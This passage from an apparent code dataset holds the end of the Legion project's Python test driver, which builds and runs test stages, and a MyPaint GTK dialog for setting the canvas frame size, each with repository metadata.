'language/regent.py')\n    if precompile:\n        # Precompile executables.\n        build_env = dict(list(env.items()) + [\n            ('SAVEOBJ', '1'),\n            ('STANDALONE', '1'),\n            ('LAUNCHER', ''),\n        ])\n        exe_tests = precompile_regent(regent_perf_tests, [], [regent_path], root_dir, build_env, thread_count)\n\n        # FIXME: PENNANT can't handle the -logfile flag coming first, so just skip it.\n        run_regent(exe_tests, [], [runner], root_dir, regent_env, thread_count, timelimit)\n    else:\n        # FIXME: PENNANT can't handle the -logfile flag coming first, so just skip it.\n        run_regent(regent_perf_tests, [], [runner, regent_path], root_dir, regent_env, thread_count, timelimit)\n\n    # Render the final charts.\n    subprocess.check_call(\n        [sys.executable,\n         os.path.join(root_dir, 'tools', 'perf_chart.py'),\n         'git@github.com:StanfordLegion/perf-data.git',\n         'git@github.com:StanfordLegion/perf-data.git'],\n        env=env)\n\ndef run_test_perf(launcher, root_dir, tmp_dir, bin_dir, env, thread_count, min_nodes, max_nodes, timelimit):\n    nodes = min_nodes\n    while nodes <= max_nodes:\n        launcher = [w.format(**{'NODES': nodes}) for w in launcher]\n        run_test_perf_one_configuration(launcher, root_dir, tmp_dir, bin_dir, env, thread_count, nodes, timelimit)\n        nodes *= 2\n\ndef check_test_legion_cxx(root_dir):\n    print('Checking that tests that SHOULD be tested are ACTUALLY tested...')\n    print()\n\n    # These are the directories we SHOULD have coverage for.\n    should_dirs = ['tutorial', 'examples', 'test']\n    should_tests = []\n    for dir in should_dirs:\n        entries = os.listdir(os.path.join(root_dir, dir))\n        for entry in entries:\n            if os.path.isdir(os.path.join(root_dir, dir, entry)):\n                should_tests.append(os.path.join(dir, entry))\n    assert len(should_tests) > 0\n\n    # These are the tests we ACTUALLY have coverage for.\n    tests = legion_cxx_tests + legion_network_cxx_tests + \\\n        legion_openmp_cxx_tests + legion_python_cxx_tests + \\\n        legion_hdf_cxx_tests + legion_kokkos_cxx_tests + \\\n        legion_fortran_tests\n    actual_tests = set()\n    for test_file, test_flags in tests:\n        actual_tests.add(os.path.dirname(test_file))\n\n    actual_tests.add('test/realm') # We test Realm separately.\n    actual_tests.add('test/performance') # We test performance separately.\n\n    # Check that all tests that SHOULD be covered are ACTUALLY covered.\n    not_tests = []\n    for should_test in should_tests:\n        if should_test not in actual_tests:\n            not_tests.append(should_test)\n    if len(not_tests) > 0:\n        print('The following tests are NOT currently being 
tested:')\n print()\n for not_test in not_tests:\n print(' %s' % not_test)\n print()\n raise Exception('There are tests that are NOT in the test suite')\n\ndef build_cmake(root_dir, tmp_dir, env, thread_count,\n test_regent, test_legion_cxx,\n test_external1, test_external2, test_perf, test_ctest):\n build_dir = os.path.join(tmp_dir, 'build')\n install_dir = os.path.join(tmp_dir, 'install')\n os.mkdir(build_dir)\n os.mkdir(install_dir)\n cmdline = ['cmake', '-DCMAKE_INSTALL_PREFIX=%s' % install_dir ]\n cmdline.append('-DCMAKE_BUILD_TYPE=%s' % ('Debug' if env['DEBUG'] == '1' else\n 'Release'))\n cmdline.append('-DLegion_BUILD_WARN_AS_ERROR=%s' % ('ON' if env.get('WARN_AS_ERROR','0') == '1' else 'OFF'))\n cmdline.append('-DLegion_MAX_DIM=%s' % env['MAX_DIM'])\n cmdline.append('-DLegion_NETWORKS=%s' % env['REALM_NETWORKS'])\n if 'EMBED_GASNET' in env:\n cmdline.append('-DLegion_EMBED_GASNet=ON')\n cmdline.append('-DGASNet_CONDUIT=' + env['CONDUIT'])\n if 'EMBED_GASNET_SRC' in env:\n cmdline.append('-DLegion_EMBED_GASNet_LOCALSRC=' + env['EMBED_GASNET_SRC'])\n cmdline.append('-DLegion_USE_CUDA=%s' % ('ON' if env['USE_CUDA'] == '1' else 'OFF'))\n if 'GPU_ARCH' in env:\n cmdline.append('-DLegion_CUDA_ARCH=%s' % env['GPU_ARCH'])\n cmdline.append('-DLegion_USE_HIP=%s' % ('ON' if env['USE_HIP'] == '1' else 'OFF'))\n if 'HIP_ARCH' in env:\n cmdline.append('-DLegion_HIP_ARCH=%s' % env['HIP_ARCH'])\n if 'THRUST_PATH' in env and env['USE_COMPLEX'] == '1':\n cmdline.append('-DHIP_THRUST_ROOT_DIR=%s' % env['THRUST_PATH'])\n cmdline.append('-DLegion_USE_NVTX=%s' % ('ON' if env['USE_NVTX'] == '1' else 'OFF'))\n cmdline.append('-DLegion_USE_OpenMP=%s' % ('ON' if env['USE_OPENMP'] == '1' else 'OFF'))\n cmdline.append('-DLegion_USE_Kokkos=%s' % ('ON' if env['USE_KOKKOS'] == '1' else 'OFF'))\n cmdline.append('-DLegion_USE_Python=%s' % ('ON' if env['USE_PYTHON'] == '1' else 'OFF'))\n cmdline.append('-DLegion_USE_LLVM=%s' % ('ON' if env['USE_LLVM'] == '1' else 'OFF'))\n cmdline.append('-DLegion_USE_HDF5=%s' % ('ON' if env['USE_HDF'] == '1' else 'OFF'))\n cmdline.append('-DLegion_USE_Fortran=%s' % ('ON' if env['LEGION_USE_FORTRAN'] == '1' else 'OFF'))\n cmdline.append('-DLegion_SPY=%s' % ('ON' if env['USE_SPY'] == '1' else 'OFF'))\n cmdline.append('-DLegion_BOUNDS_CHECKS=%s' % ('ON' if env['BOUNDS_CHECKS'] == '1' else 'OFF'))\n cmdline.append('-DLegion_PRIVILEGE_CHECKS=%s' % ('ON' if env['PRIVILEGE_CHECKS'] == '1' else 'OFF'))\n cmdline.append('-DLegion_REDOP_COMPLEX=%s' % ('ON' if env['USE_COMPLEX'] == '1' else 'OFF'))\n cmdline.append('-DLegion_BACKTRACE_USE_LIBDW=%s' % ('ON' if env['REALM_BACKTRACE_USE_LIBDW'] == '1' else 'OFF'))\n if 'LEGION_WARNINGS_FATAL' in env:\n cmdline.append('-DLegion_WARNINGS_FATAL=%s' % ('ON' if env['LEGION_WARNINGS_FATAL'] == '1' else 'OFF'))\n if test_ctest:\n cmdline.append('-DLegion_ENABLE_TESTING=ON')\n if 'LAUNCHER' in env:\n cmdline.append('-DLegion_TEST_LAUNCHER=%s' % env['LAUNCHER'])\n if env['USE_CUDA'] == '1' or env['USE_HIP'] == '1':\n cmdline.append('-DLegion_TEST_ARGS=-ll:gpu 1 -ll:fsize 1024')\n else:\n cmdline.append('-DLegion_ENABLE_TESTING=OFF')\n if test_regent or (test_legion_cxx and (env['USE_PYTHON'] == '1')):\n cmdline.append('-DLegion_BUILD_BINDINGS=ON')\n if test_legion_cxx or test_ctest:\n cmdline.extend(['-DLegion_BUILD_APPS=ON',\n '-DLegion_BUILD_EXAMPLES=ON',\n '-DLegion_BUILD_TUTORIAL=ON',\n '-DLegion_BUILD_TESTS=ON',\n ])\n # several different conditions force the use of shared libraries\n if test_regent or test_external1 or test_external2 or 
(env['USE_PYTHON'] == '1') or (env['SHARED_OBJECTS'] == '1'):\n cmdline.append('-DBUILD_SHARED_LIBS=ON')\n else:\n cmdline.append('-DBUILD_SHARED_LIBS=OFF')\n # if MARCH is set in the environment, give that to cmake as BUILD_MARCH\n if 'MARCH' in env:\n cmdline.append('-DBUILD_MARCH=' + env['MARCH'])\n # add cxx standard\n if 'CXX_STANDARD' in env:\n cmdline.append('-DCMAKE_CXX_STANDARD=' + env['CXX_STANDARD'])\n # cmake before 3.16 doesn't know how to look for CUDAHOSTCXX\n if 'CUDAHOSTCXX' in env:\n cmdline.append('-DCMAKE_CUDA_HOST_COMPILER=' + env['CUDAHOSTCXX'])\n # add any extra cmake args requested in the environment\n if 'EXTRA_CMAKE_ARGS' in env:\n cmdline.extend(shlex.split(env['EXTRA_CMAKE_ARGS']))\n # last argument to cmake is the root of the tree\n cmdline.append(root_dir)\n\n cmd(cmdline, env=env, cwd=build_dir)\n verbose_env=env.copy()\n verbose_env['VERBOSE'] = '1'\n cmd([make_exe, '-C', build_dir, '-j', str(thread_count)], env=verbose_env)\n cmd([make_exe, '-C', build_dir, 'install'], env=env)\n return os.path.join(build_dir, 'bin')\n\ndef build_legion_prof_rs(root_dir, tmp_dir, env):\n legion_prof_dir = os.path.join(root_dir, 'tools', 'legion_prof_rs')\n cmd(['cargo', 'install',\n '--all-features',\n '--locked',\n '--debug', # Enables debug checks. Still optimizes like -O2.\n '--path', legion_prof_dir,\n '--root', tmp_dir],\n env=env)\n cmd(['cargo', 'test', '--all-features'], env=env, cwd=legion_prof_dir)\n cmd(['cargo', 'fmt', '--all', '--', '--check'], env=env, cwd=legion_prof_dir)\n\ndef build_regent(root_dir, env):\n cmd([os.path.join(root_dir, 'language/travis.py'), '--install-only'], env=env)\n\ndef clean_cxx(tests, root_dir, env, thread_count):\n env = dict(list(env.items()) + [\n ('MAKEFLAGS', 's'), # Always silence initial clean.\n ])\n for test_file, test_flags in tests:\n test_dir = os.path.dirname(os.path.join(root_dir, test_file))\n cmd([make_exe, '-C', test_dir, 'clean'], env=env)\n\ndef build_make_clean(root_dir, env, thread_count, test_legion_cxx, test_perf,\n test_external1, test_external2, test_private):\n # External and private also require cleaning, even though they get\n # built separately.\n if test_legion_cxx or test_perf or test_external1 or test_external2 or test_private:\n clean_cxx(legion_cxx_tests, root_dir, env, thread_count)\n if test_legion_cxx and env['LEGION_USE_FORTRAN'] == '1':\n clean_cxx(legion_fortran_tests, root_dir, env, thread_count)\n\ndef option_enabled(option, options, default, envprefix='', envname=None):\n if options is not None: return option in options\n if envname is not None:\n option_var = envname\n else:\n option_var = '%s%s' % (envprefix, option.upper())\n if option_var in os.environ: return os.environ[option_var] == '1'\n return default\n\nclass Stage(object):\n __slots__ = ['name', 'begin_time']\n def __init__(self, name):\n self.name = name\n def __enter__(self):\n self.begin_time = datetime.datetime.now()\n print()\n print('#'*60)\n print('### Entering Stage: %s' % self.name)\n print('#'*60)\n print()\n sys.stdout.flush()\n def __exit__(self, exc_type, exc_val, exc_tb):\n end_time = datetime.datetime.now()\n print()\n print('#'*60)\n print('### Exiting Stage: %s' % self.name)\n print('### * Exception Type: %s' % exc_type)\n print('### * Elapsed Time: %s' % (end_time - self.begin_time))\n print('#'*60)\n print()\n sys.stdout.flush()\n\ndef report_mode(debug, max_dim, launcher,\n test_regent, test_legion_cxx, test_fuzzer, test_realm,\n test_external1, test_external2, test_private,\n test_perf, test_ctest, 
test_jupyter, networks,\n use_cuda, use_hip, use_openmp, use_kokkos, use_python, use_llvm,\n use_hdf, use_fortran, use_spy, use_prof,\n use_bounds_checks, use_privilege_checks, use_complex,\n use_shared_objects,\n use_gcov, use_cmake, use_rdir, use_nvtx, use_libdw, cxx_standard):\n print()\n print('#'*60)\n print('### Test Suite Configuration')\n print('###')\n print('### Python:')\n print('\\n'.join(['### ' + line for line in sys.version.split('\\n')]))\n print('###')\n print('### Debug: %s' % debug)\n print('### Launcher: %s' % launcher)\n print('###')\n print('### Running Tests:')\n print('### * Regent: %s' % test_regent)\n print('### * Legion C++: %s' % test_legion_cxx)\n print('### * Fuzzer: %s' % test_fuzzer)\n print('### * Realm: %s' % test_realm)\n print('### * External1: %s' % test_external1)\n print('### * External2: %s' % test_external2)\n print('### * Private: %s' % test_private)\n print('### * Perf: %s' % test_perf)\n print('### * CTest: %s' % test_ctest)\n print('### * Jupyter: %s' % test_jupyter)\n print('###')\n print('### Build Flags:')\n print('### * Networks: %s' % networks)\n print('### * CUDA: %s' % use_cuda)\n print('### * HIP: %s' % use_hip)\n print('### * OpenMP: %s' % use_openmp)\n print('### * Kokkos: %s' % use_kokkos)\n print('### * Python: %s' % use_python)\n print('### * LLVM: %s' % use_llvm)\n print('### * HDF5: %s' % use_hdf)\n print('### * Fortran: %s' % use_fortran)\n print('### * Spy: %s' % use_spy)\n print('### * Prof: %s' % use_prof)\n print('### * Bounds: %s' % use_bounds_checks)\n print('### * Privilege: %s' % use_privilege_checks)\n print('### * Cplx Redop: %s' % use_complex)\n print('### * Shared Obj: %s' % use_shared_objects)\n print('### * Gcov: %s' % use_gcov)\n print('### * CMake: %s' % use_cmake)\n print('### * RDIR: %s' % use_rdir)\n print('### * NVTX: %s' % use_nvtx)\n print('### * LIBDW: %s' % use_libdw)\n print('### * Max DIM: %s' % max_dim)\n print('### * CXX STD: %s' % cxx_standard)\n print('#'*60)\n print()\n sys.stdout.flush()\n\ndef run_tests(test_modules=None,\n debug=True,\n max_dim=3,\n use_features=None,\n networks='',\n launcher=None,\n thread_count=None,\n root_dir=None,\n tmp_dir=None,\n check_ownership=False,\n keep_tmp_dir=False,\n timelimit=None,\n verbose=False):\n if thread_count is None:\n try:\n # this correctly considers the current affinity mask\n thread_count = len(os.sched_getaffinity(0))\n except AttributeError:\n # this works on macos\n thread_count = multiprocessing.cpu_count()\n\n if root_dir is None:\n root_dir = os.path.dirname(os.path.realpath(__file__))\n\n if timelimit is None:\n if 'TIMELIMIT' in os.environ:\n timelimit = int(os.environ['TIMELIMIT'])\n\n # Determine which test modules to run.\n def module_enabled(module, default=True, prefix='TEST_', **kwargs):\n return option_enabled(module, test_modules, default,\n envprefix=prefix, **kwargs)\n test_regent = module_enabled('regent')\n test_legion_cxx = module_enabled('legion_cxx')\n test_fuzzer = module_enabled('fuzzer', False)\n test_realm = module_enabled('realm', not debug)\n test_external1 = module_enabled('external1', False)\n test_external2 = module_enabled('external2', False)\n test_private = module_enabled('private', False)\n test_perf = module_enabled('perf', False)\n test_ctest = module_enabled('ctest', False)\n test_jupyter = module_enabled('jupyter', False)\n\n # Determine which features to build with.\n def feature_enabled(feature, default=True, prefix='USE_', **kwargs):\n return option_enabled(feature, use_features, default,\n 
envprefix=prefix, **kwargs)\n    use_cuda = feature_enabled('cuda', False)\n    use_hip = feature_enabled('hip', False)\n    use_openmp = feature_enabled('openmp', False)\n    use_kokkos = feature_enabled('kokkos', False)\n    use_python = feature_enabled('python', False)\n    use_llvm = feature_enabled('llvm', False)\n    use_hdf = feature_enabled('hdf', False)\n    use_fortran = feature_enabled('fortran', False, prefix='LEGION_USE_')\n    use_spy = feature_enabled('spy', False)\n    use_prof = feature_enabled('prof', False)\n    use_bounds_checks = feature_enabled('bounds', False,\n                                        envname='BOUNDS_CHECKS')\n    use_privilege_checks = feature_enabled('privilege', False,\n                                           envname='PRIVILEGE_CHECKS')\n    use_complex = feature_enabled('complex', True)\n    use_gcov = feature_enabled('gcov', False)\n    use_cmake = feature_enabled('cmake', False)\n    use_rdir = feature_enabled('rdir', True)\n    use_nvtx = feature_enabled('nvtx', False)\n    use_libdw = feature_enabled('libdw', False, prefix='REALM_BACKTRACE_USE_')\n    use_shared_objects = feature_enabled('shared', False,\n                                         envname='SHARED_OBJECTS')\n\n    if use_kokkos and not use_cmake:\n        raise Exception('Kokkos support requires use of CMake')\n\n    # Determine parameters for performance tests.\n    if test_perf:\n        if 'PERF_MIN_NODES' not in os.environ:\n            raise Exception('Performance tests requested but PERF_MIN_NODES is not set')\n        min_nodes = int(os.environ['PERF_MIN_NODES'])\n        if 'PERF_MAX_NODES' not in os.environ:\n            raise Exception('Performance tests requested but PERF_MAX_NODES is not set')\n        max_nodes = int(os.environ['PERF_MAX_NODES'])\n\n    if test_perf and debug:\n        raise Exception('Performance tests requested but DEBUG is enabled')\n\n    if test_ctest and not use_cmake:\n        raise Exception('CTest cannot be used without CMake')\n\n    if test_jupyter and not use_python:\n        raise Exception('Jupyter requires Python')\n\n    if networks and launcher is None:\n        raise Exception('Network(s) is enabled but launcher is not set (use --launcher or LAUNCHER)')\n    launcher = launcher.split() if launcher is not None else []\n\n    # CXX Standard\n    cxx_standard = os.environ['CXX_STANDARD'] if 'CXX_STANDARD' in os.environ else ''\n    # if not using cmake, add -std=c++NN to CXXFLAGS\n    if not use_cmake:\n        if cxx_standard != '':\n            if 'CXXFLAGS' in os.environ:\n                os.environ['CXXFLAGS'] += \" -std=c++\" + cxx_standard\n            else:\n                os.environ['CXXFLAGS'] = \" -std=c++\" + cxx_standard\n\n    gcov_flags = ' -ftest-coverage -fprofile-arcs'\n\n    if check_ownership:\n        check_test_legion_cxx(root_dir)\n        return\n\n    report_mode(debug, max_dim, launcher,\n                test_regent, test_legion_cxx, test_fuzzer, test_realm,\n                test_external1, test_external2, test_private,\n                test_perf, test_ctest, test_jupyter,\n                networks,\n                use_cuda, use_hip, use_openmp, use_kokkos, use_python, use_llvm,\n                use_hdf, use_fortran, use_spy, use_prof,\n                use_bounds_checks, use_privilege_checks, use_complex,\n                use_shared_objects,\n                use_gcov, use_cmake, use_rdir, use_nvtx, use_libdw, cxx_standard)\n\n    if not tmp_dir:\n        tmp_dir = tempfile.mkdtemp(dir=root_dir)\n    else:\n        if os.path.exists(tmp_dir):\n            shutil.rmtree(tmp_dir)\n        os.mkdir(tmp_dir)\n\n    if verbose:\n        print('Using build directory: %s' % tmp_dir)\n        print()\n\n    # Normalize the test environment.\n    env = dict(list(os.environ.items()) + [\n        ('DEBUG', '1' if debug else '0'),\n        ('LAUNCHER', ' '.join(launcher)),\n        ('REALM_NETWORKS', networks),\n        ('USE_CUDA', '1' if use_cuda else '0'),\n        ('TEST_CUDA', '1' if use_cuda else '0'),\n        ('USE_HIP', '1' if use_hip else '0'),\n        ('TEST_HIP', '1' if use_hip 
else '0'),\n ('USE_OPENMP', '1' if use_openmp else '0'),\n ('TEST_OPENMP', '1' if use_openmp else '0'),\n ('USE_KOKKOS', '1' if use_kokkos else '0'),\n ('TEST_KOKKOS', '1' if use_kokkos else '0'),\n ('USE_PYTHON', '1' if use_python else '0'),\n ('TEST_PYTHON', '1' if use_python else '0'),\n ('USE_LLVM', '1' if use_llvm else '0'),\n ('USE_HDF', '1' if use_hdf else '0'),\n ('TEST_HDF', '1' if use_hdf else '0'),\n ('LEGION_USE_FORTRAN', '1' if use_fortran else '0'),\n ('TEST_FORTRAN', '1' if use_fortran else '0'),\n ('USE_SPY', '1' if use_spy else '0'),\n ('TEST_SPY', '1' if use_spy else '0'),\n ('USE_PROF', '1' if use_prof else '0'),\n ('TEST_PROF', '1' if use_prof else '0'),\n ('BOUNDS_CHECKS', '1' if use_bounds_checks else '0'),\n ('PRIVILEGE_CHECKS', '1' if use_privilege_checks else '0'),\n ('USE_COMPLEX', '1' if use_complex else '0'),\n ('SHARED_OBJECTS', '1' if use_shared_objects else '0'),\n ('TEST_GCOV', '1' if use_gcov else '0'),\n ('USE_RDIR', '1' if use_rdir else '0'),\n ('USE_NVTX', '1' if use_nvtx else '0'),\n ('REALM_BACKTRACE_USE_LIBDW', '1' if use_libdw else '0'),\n ('MAX_DIM', str(max_dim)),\n ('LG_RT_DIR', os.path.join(root_dir, 'runtime')),\n ('DEFINE_HEADERS_DIR', os.path.join(root_dir, 'runtime')),\n ('CMAKE_BUILD_DIR', os.path.join(tmp_dir, 'build')),\n ('TMP_BIN_DIR', os.path.join(tmp_dir, 'bin'))] + (\n\n # Gcov doesn't get a USE_GCOV flag, but instead stuff the GCC\n # options for Gcov on to the compile and link flags.\n [('CXXFLAGS', (os.environ['CXXFLAGS'] + gcov_flags\n if 'CXXFLAGS' in os.environ else gcov_flags)),\n ('LDFLAGS', (os.environ['LDFLAGS'] + gcov_flags\n if 'LDFLAGS' in os.environ else gcov_flags)),\n ] if use_gcov else []))\n\n try:\n # Build tests.\n with Stage('build'):\n if use_prof or use_spy:\n build_legion_prof_rs(root_dir, tmp_dir, env)\n if use_prof:\n run_test_legion_prof_mypy(root_dir)\n if use_cmake:\n # We should always be using ctest if we're building with\n # cmake, except for some unusual cases with Regent\n # (ask @eslaught for details about Regent cases)\n assert test_ctest or test_regent\n bin_dir = build_cmake(\n root_dir, tmp_dir, env, thread_count,\n test_regent, test_legion_cxx, test_external1,\n test_external2,\n test_perf, test_ctest)\n else:\n # With GNU Make, builds happen inline. 
But clean here.\n build_make_clean(\n root_dir, env, thread_count, test_legion_cxx, test_perf,\n # These configurations also need to be cleaned first.\n test_external1, test_external2, test_private)\n bin_dir = None\n\n # Run tests.\n if test_regent:\n with Stage('regent'):\n run_test_regent(launcher, root_dir, tmp_dir, bin_dir, env, thread_count)\n if test_legion_cxx:\n with Stage('legion_cxx'):\n run_test_legion_cxx(launcher, root_dir, tmp_dir, bin_dir, env, thread_count, timelimit)\n if use_prof:\n run_test_legion_prof_cxx(launcher, root_dir, tmp_dir, bin_dir, env, thread_count, timelimit)\n if networks:\n run_test_legion_network_cxx(launcher, root_dir, tmp_dir, bin_dir, env, thread_count, timelimit)\n if use_openmp:\n run_test_legion_openmp_cxx(launcher, root_dir, tmp_dir, bin_dir, env, thread_count, timelimit)\n if use_kokkos:\n run_test_legion_kokkos_cxx(launcher, root_dir, tmp_dir, bin_dir, env, thread_count, timelimit)\n if use_python:\n run_test_legion_python_cxx(launcher, root_dir, tmp_dir, bin_dir, env, thread_count, timelimit)\n if use_hdf:\n run_test_legion_hdf_cxx(launcher, root_dir, tmp_dir, bin_dir, env, thread_count, timelimit)\n if use_fortran:\n run_test_legion_fortran(launcher, root_dir, tmp_dir, bin_dir, env, thread_count, timelimit)\n if test_fuzzer:\n with Stage('fuzzer'):\n run_test_fuzzer(launcher, root_dir, tmp_dir, bin_dir, env, thread_count)\n if test_realm and not test_ctest:\n with Stage('realm'):\n run_test_realm(launcher, root_dir, tmp_dir, bin_dir, env, thread_count, timelimit)\n if test_external1:\n with Stage('external1'):\n if not test_regent:\n build_regent(root_dir, env)\n run_test_external1(launcher, root_dir, tmp_dir, bin_dir, env, thread_count, timelimit)\n if test_external2:\n with Stage('external2'):\n if not test_regent:\n build_regent(root_dir, env)\n run_test_external2(launcher, root_dir, tmp_dir, bin_dir, env, thread_count, timelimit)\n if test_private:\n with Stage('private'):\n run_test_private(launcher, root_dir, tmp_dir, bin_dir, env, thread_count, timelimit)\n if test_perf:\n with Stage('perf'):\n run_test_perf(launcher, root_dir, tmp_dir, bin_dir, env, thread_count, min_nodes, max_nodes, timelimit)\n if test_ctest:\n with Stage('ctest'):\n run_test_ctest(launcher, root_dir, tmp_dir, bin_dir, env, thread_count, timelimit)\n if test_jupyter:\n with Stage('jupyter'):\n run_test_legion_jupyter_cxx(launcher, root_dir, tmp_dir, bin_dir, env, thread_count, timelimit)\n finally:\n if keep_tmp_dir:\n print('Leaving build directory:')\n print(' %s' % tmp_dir)\n else:\n if verbose:\n print('Removing build directory:')\n print(' %s' % tmp_dir)\n shutil.rmtree(tmp_dir)\n\n# behaves enough like a normal list for ArgumentParser's needs, except for\n# the __contains__ method, which accepts a list of values and checks each\n# one for membership\nclass MultipleChoiceList(object):\n def __init__(self, *args):\n self.list = list(args)\n\n def __contains__(self, x):\n if type(x) is list:\n for v in x:\n if v not in self.list:\n return False\n return True\n else:\n return x in self.list\n\n def __iter__(self):\n return self.list.__iter__()\n\nclass ExtendAction(argparse.Action):\n def __init__(self, **kwargs):\n super(ExtendAction, self).__init__(**kwargs)\n\n def __call__(self, parser, namespace, values, option_string=None):\n items = getattr(namespace, self.dest, None)\n items = items[:] if items else []\n if type(values) is list:\n items.extend(values)\n else:\n items.append(values)\n setattr(namespace, self.dest, items)\n\ndef driver():\n parser = 
argparse.ArgumentParser(\n        description = 'Legion test suite')\n\n    # What tests to run:\n    parser.add_argument(\n        '--test', dest='test_modules', action=ExtendAction,\n        choices=MultipleChoiceList('regent', 'legion_cxx', 'fuzzer',\n                                   'realm', 'external1', 'external2',\n                                   'private', 'perf', 'ctest', 'jupyter'),\n        type=lambda s: s.split(','),\n        default=None,\n        help='Test modules to run (also via TEST_*).')\n\n    # Build options:\n    parser.add_argument(\n        '--debug', dest='debug', action='store_true',\n        default=os.environ['DEBUG'] == '1' if 'DEBUG' in os.environ else True,\n        help='Build Legion in debug mode (also via DEBUG).')\n    parser.add_argument(\n        '--no-debug', dest='debug', action='store_false',\n        help='Disable debug mode (equivalent to DEBUG=0).')\n    parser.add_argument(\n        '--max-dim', dest='max_dim', type=int,\n        default=int(os.environ['MAX_DIM']) if 'MAX_DIM' in os.environ else 3,\n        help='Maximum number of dimensions (also via MAX_DIM).')\n    parser.add_argument(\n        '--use', dest='use_features', action=ExtendAction,\n        choices=MultipleChoiceList('gasnet', 'cuda', 'hip', 'openmp', 'kokkos',\n                                   'python', 'llvm', 'hdf', 'fortran', 'spy', 'prof',\n                                   'bounds', 'privilege', 'complex',\n                                   'gcov', 'cmake', 'rdir', 'nvtx'),\n        type=lambda s: s.split(','),\n        default=None,\n        help='Build Legion with features (also via USE_*).')\n    parser.add_argument(\n        '--network', dest='networks', action='store',\n        default=os.environ.get('REALM_NETWORKS', 'gasnet1' if os.environ.get('USE_GASNET', '0') == '1' else ''),\n        help='Network backend(s) to build with')\n    parser.add_argument(\n        '--launcher', dest='launcher', action='store',\n        default=os.environ['LAUNCHER'] if 'LAUNCHER' in os.environ else None,\n        help='Launcher for Legion tests (also via LAUNCHER).')\n\n    parser.add_argument(\n        '-C', '--directory', dest='root_dir', metavar='DIR', action='store', required=False,\n        help='Legion root directory.')\n\n    parser.add_argument(\n        '--tmp-dir', dest='tmp_dir', metavar='DIR', action='store', required=False,\n        help='Temporary directory path for out-of-source builds')\n\n    parser.add_argument(\n        '-j', dest='thread_count', nargs='?', type=int,\n        help='Number of threads used to compile.')\n\n    parser.add_argument(\n        '--check', dest='check_ownership', action='store_true',\n        help='Check for tests that are being skipped.')\n\n    parser.add_argument(\n        '--keep', dest='keep_tmp_dir', action='store_true',\n        help='Keep temporary directory.')\n\n    parser.add_argument(\n        '--timelimit', dest='timelimit', type=int,\n        help='Maximum time (in seconds) allowed for individual test execution')\n\n    parser.add_argument(\n        '-v', '--verbose', dest='verbose', action='store_true',\n        help='Print more debugging information.')\n\n    args = parser.parse_args()\n\n    run_tests(**vars(args))\n\nif __name__ == '__main__':\n    driver()\n","repo_name":"StanfordLegion/legion","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":62385,"program_lang":"python","lang":"en","doc_type":"code","stars":616,"dataset":"github-code","pt":"31"}
+{"seq_id":"39415403127","text":"\nimport gtk\n\nfrom gettext import gettext as _\n\nimport windowing\nfrom lib import tiledsurface # For the tile size\n\nclass Window(windowing.Dialog):\n    def __init__(self, app):\n        buttons = (gtk.STOCK_OK, gtk.RESPONSE_ACCEPT)\n        windowing.Dialog.__init__(self, app, _(\"Frame\"), app.drawWindow, buttons=buttons)\n\n        self.callbacks_active = False\n\n        x, y, w, h = self.app.doc.model.get_frame()\n\n        # FIXME: don't limit frame to multiples of N\n        # Requires PNG saving to support saving of partial tiles\n        # 
See lib/pixbufsurface.py save_as_png()\n tile_size = tiledsurface.N\n max_size = tile_size*500\n self.width_adj = gtk.Adjustment(w, upper=max_size, step_incr=tile_size, page_incr=tile_size*4)\n self.height_adj = gtk.Adjustment(h, upper=max_size, step_incr=tile_size, page_incr=tile_size*4)\n\n self.width_adj.connect('value-changed', self.on_size_adjustment_changed)\n self.height_adj.connect('value-changed', self.on_size_adjustment_changed)\n\n self.app.doc.model.frame_observers.append(self.on_frame_changed)\n\n self._init_ui()\n\n def _init_ui(self):\n height_label = gtk.Label(_('Height'))\n width_label = gtk.Label(_('Width'))\n\n height_entry = gtk.SpinButton(self.height_adj)\n width_entry = gtk.SpinButton(self.width_adj)\n\n size_table = gtk.Table(2, 2)\n size_table.attach(width_label, 0, 1, 0, 1)\n size_table.attach(height_label, 0, 1, 1, 2)\n size_table.attach(width_entry, 1, 2, 0, 1)\n size_table.attach(height_entry, 1, 2, 1, 2)\n\n crop_layer_button = gtk.Button(_('Crop to active layer bounds'))\n crop_document_button = gtk.Button(_('Crop to document bounds'))\n crop_layer_button.connect('clicked', self.crop_frame_cb, 'CropFrameToLayer')\n crop_document_button.connect('clicked', self.crop_frame_cb, 'CropFrameToDocument')\n\n self.enable_button = gtk.CheckButton(_('Enabled'))\n self.enable_button.connect('toggled', self.on_frame_toggled)\n enabled = self.app.doc.model.frame_enabled\n self.enable_button.set_active(enabled)\n\n top_vbox = self.get_content_area()\n top_vbox.pack_start(size_table)\n top_vbox.pack_start(crop_layer_button)\n top_vbox.pack_start(crop_document_button)\n top_vbox.pack_start(self.enable_button)\n\n self.connect('response', self.on_response)\n\n def on_response(self, dialog, response_id):\n if response_id == gtk.RESPONSE_ACCEPT:\n self.hide()\n\n # FRAME\n def crop_frame_cb(self, button, command):\n if command == 'CropFrameToLayer':\n bbox = self.app.doc.model.get_current_layer().surface.get_bbox()\n elif command == 'CropFrameToDocument':\n bbox = self.app.doc.model.get_bbox()\n else: assert 0\n self.app.doc.model.set_frame(*bbox)\n\n def on_frame_toggled(self, button):\n \"\"\"Update the frame state in the model.\"\"\"\n if self.callbacks_active:\n return\n\n self.app.doc.model.set_frame_enabled(button.get_active())\n\n def on_size_adjustment_changed(self, adjustment):\n \"\"\"Update the frame size in the model.\"\"\"\n if self.callbacks_active:\n return\n\n width = int(self.width_adj.get_value())\n height = int(self.height_adj.get_value())\n\n N = tiledsurface.N\n rwidth = N * (abs(width) // N)\n rheight = N * (abs(height) // N)\n if width != rwidth:\n width = rwidth\n self.width_adj.set_value(width)\n if height != rheight:\n height = rheight\n self.height_adj.set_value(height)\n self.app.doc.model.set_frame(width=width, height=height)\n\n def on_frame_changed(self):\n \"\"\"Update the UI to reflect the model.\"\"\"\n self.callbacks_active = True # Prevent callback loops\n\n x, y, w, h = self.app.doc.model.get_frame()\n self.width_adj.set_value(w)\n self.height_adj.set_value(h)\n enabled = self.app.doc.model.frame_enabled\n self.enable_button.set_active(enabled)\n\n self.callbacks_active = False\n","repo_name":"benosteen/mypaint","sub_path":"gui/framewindow.py","file_name":"framewindow.py","file_ext":"py","file_size_in_byte":4129,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"31"} +{"seq_id":"24710520988","text":"# Define a model\nimport torch\nimport torch.nn as nn\nfrom torchbenchmark.network.core import 
